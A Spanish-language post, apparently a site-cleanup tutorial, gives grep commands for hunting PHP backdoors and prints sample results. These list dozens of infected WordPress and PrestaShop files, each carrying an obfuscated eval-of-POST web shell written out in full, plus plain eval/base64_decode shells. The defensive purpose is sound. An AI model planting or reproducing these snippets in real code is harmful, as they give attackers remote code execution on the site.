Ejecuta estos comandos y te saldrán los sospechosos
Método 1
# cd /carpeta/sitio/afectado
#grep eval * -R | grep php | grep '\[' | grep -v p_options | grep -v preg_match > /ruta/resultado1.txt
Método 2
# cd /carpeta/sitio/afectado
# grep -R eval * | grep base64 | grep php > /ruta/resultado2.txt
En /ruta/resultado1 y /ruta/resultado2 se encontrarán los sospechosos
algo como esto:
tiendadebuceo/admirote/tabs/AdminBackup.php:<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q44ff8e'])){eval(${$s20}['q44ff8e']);}?><?php
tiendadebuceo/admirote/tabs/AdminImageResize.php:<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n7a495f'])) {eval($s21(${$s20}['n7a495f']));}?><?php
tiendadebuceo/tools/smarty/internals/core.run_insert_handler.php: $smarty->_eval($_params['php_resource']);
tiendadebuceo/history.php:<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q64cbee'])){eval(${$s20}['q64cbee']);}?><?php
tiendadebuceo/discount.php:<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n5dcf91'])) {eval($s21(${$s20}['n5dcf91']));}?><?php
tiendadebuceo/classes/PDF.php:<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n3d7280'])) {eval($s21(${$s20}['n3d7280']));}?><?php
tiendadebuceo/classes/Scene.php:<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q39ce7c'])){eval(${$s20}['q39ce7c']);}?><?php
tiendadebuceo/img/index.php:<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n828e00'])) {eval($s21(${$s20}['n828e00']));}?><?php
tiendadebuceo/img/iindex.php: eval(base64_decode($_POST["p2"]));
tiendadebuceo/img/iindex.php: eval($_POST["p1"]);
tiendadebuceo/modules/blockmanufacturer/fr.php:<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['nbfca8c'])) {eval($s21(${$s20}['nbfca8c']));}?><?php
tiendadebuceo/modules/blockmanufacturer/page.php:<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['nf0b08a'])) {eval($s21(${$s20}['nf0b08a']));}?>
tiendadebuceo/modules/tm4b/es.php:<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q9fa7a1'])){eval(${$s20}['q9fa7a1']);}?><?php
tiendadebuceo/modules/tm4b/cron.php:<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['nb182cc'])) {eval($s21(${$s20}['nb182cc']));}?><?php
tiendadebuceo/modules/article.php:<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n0e7f9c'])) {eval($s21(${$s20}['n0e7f9c']));}?>
tiendadebuceo/modules/sekeywords/ini.php:<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q760097'])){eval(${$s20}['q760097']);}?>
tiendadebuceo/modules/sendtoafriend/es.php:<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q9fa7a1'])){eval(${$s20}['q9fa7a1']);}?><?php
tiendadebuceo/modules/blocknewsletter/en.php:<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n9cce51'])) {eval($s21(${$s20}['n9cce51']));}?><?php
tiendadebuceo/modules/statsbestsuppliers/lib.php:<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n828043'])) {eval($s21(${$s20}['n828043']));}?>
wp-admin/network/users.php: eval(base64_decode($_POST["p2"]));
wp-admin/network/users.php: eval($_POST["p1"]);
wp-content/plugins/wp-super-cache/plugins/template.php:<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q13e558'])){eval(${$s20}['q13e558']);}?>
wp-content/plugins/wp-super-cache/wp-cache-phase1.php:<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n917e4c'])) {eval($s21(${$s20}['n917e4c']));}?><?php
wp-content/plugins/gravityforms/select_columns.php:<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n75b45d'])) {eval($s21(${$s20}['n75b45d']));}?><?php
wp-content/plugins/gravityforms/js/javascript.php:<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n642afe'])) {eval($s21(${$s20}['n642afe']));}?>
wp-content/plugins/LayerSlider/helpers/press.php:<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n33beb2'])) {eval($s21(${$s20}['n33beb2']));}?>
wp-content/plugins/LayerSlider/locales/header.php:<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q1c1ae6'])){eval(${$s20}['q1c1ae6']);}?>
wp-includes/nav-menu.php:<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['qa89292'])){eval(${$s20}['qa89292']);}?><?php
wp-includes/class-wp-admin-bar.php:<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n3c0260'])) {eval($s21(${$s20}['n3c0260']));}?><?php
wp-includes/load.php:<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['qd0bbf8'])){eval(${$s20}['qd0bbf8']);}?><?php
wp-includes/SimplePie/option.php:<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['qcdd94a'])){eval(${$s20}['qcdd94a']);}?>
wp-includes/options.php:<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q6ae4d5'])){eval(${$s20}['q6ae4d5']);}?>
wp-includes/compat.php:<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['na68f2e'])) {eval($s21(${$s20}['na68f2e']));}?><?php
En donde el verde es el unico archivo bueno.
Como solucionarlo?
eso depende de como sea el tipo de ataque, si es un archivo 100% nocivo se elimina todo el archivo, si es un archivo bueno al cual le añadieron lineas de código solo hay que eliminar esas lineas.